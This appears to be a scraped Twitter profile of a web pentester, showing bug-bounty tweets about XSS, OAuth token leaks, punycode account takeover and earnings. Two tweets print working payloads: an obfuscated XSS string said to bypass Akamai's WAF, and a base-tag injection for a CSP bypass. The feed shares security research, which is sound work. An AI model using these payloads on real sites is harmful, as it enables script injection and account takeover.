Amirabbas Ataei (@imayrix) 's Twitter Profile
Amirabbas Ataei

@imayrix

Bug Hunter & Web Application Pentester

ID: 1438514705924984834

16-09-2021 14:46:56

881 Tweet

3,3K Followers

515 Following

LIL NIX (@thelilnix) 's Twitter Profile Photo

This was the XSS payload that I used to bypass Akamai WAF: ' oncontent\visibilityautostatechange='a=alert,(a?a:a)(origin)' x=\v+styl\u0065='content-visibility:auto #bugbountytips #bugbounty #lil_tips Let me explain why it's working👇

LIL NIX (@thelilnix) 's Twitter Profile Photo

When you use "Tagged Templates" (e.g, alert`123`), JavaScript passes something like this to the function: alert(["123"]) NOTE: Since alert uses "toString" on the given parameter, it becomes ["123"].toString() and then "123".

YS (@yshahinzadeh) 's Twitter Profile Photo

first time participating in NahamCon. I’ll cover a practical attack scenario I've made $50K with. Hope everything goes well for me

YS (@yshahinzadeh) 's Twitter Profile Photo

just wrote a blog post based on this technique and described the methodology to take advantage of it, the post also includes an easy-to-set-up testbed to practice with, hope you find it useful blog.voorivex.team/leaking-oauth-…

AmirMohammad Safari (@amirmsafari) 's Twitter Profile Photo

We’ve created a lab to demonstrate how an OAuth token can be leaked using a referrer policy override. Check out the article and try the lab here github.com/VoorivexTeam/w…

Omid Rezaei (@omidxrz) 's Twitter Profile Photo

YS and I created two postMessage challenges based on real-world cases, it's commonly used by developers to secure postMessages this is the first one, can you exploit it?

Ben Sadeghipour (@nahamsec) 's Twitter Profile Photo

What do you get when you mix punycode and 0-click account takeover? A talk you absolutely don’t want to miss. @yshahinzadeh & @amirmsafari are teaming up at #NahamCon2025 to walk you through a wild exploit chain 🔥 🗓️ May 23 📍 nahamcon.com

YS (@yshahinzadeh) 's Twitter Profile Photo

How did we (AmirMohammad Safari) earn $50k using the Punycode technique? I’ve published a detailed blog post about our recent talk, we included 3 attack scenarios, one of which poses a high risk of account takeover on any "Login with GitLab" implementation blog.voorivex.team/puny-code-0-cl…

slonser (@slonser_) 's Twitter Profile Photo

My new research Escalation of Self-XSS to XSS using modern browser capabilities. blog.slonser.info/posts/make-sel…

YS (@yshahinzadeh) 's Twitter Profile Photo

this one is going to be paid $10k, public program. I think I should drop a blog post on it because it had a tricky WAF bypass. But for a quick note: I used the <base> tag to bypass the CSP, Payload: param1=+href=https://attsite%20%22&param2=href%22%3E%3Cbase%20

Sky Desperados (@jusxing) 's Twitter Profile Photo

After my first year of full-time bug hunting, I successfully completed Justin’s Challenge on HackerOne . I want to share a few things that might help beginners. The bugs I’ve earned the most from are IDOR and XSS — they’re great to focus on when you're getting started. One

Omid Rezaei (@omidxrz) 's Twitter Profile Photo

after many unlucky moments in bug bounty, july was fun with interesting findings, I made around $30k bounty, mostly from XSS and OAuth in august, I've planned to dive deeper into client-side stuff
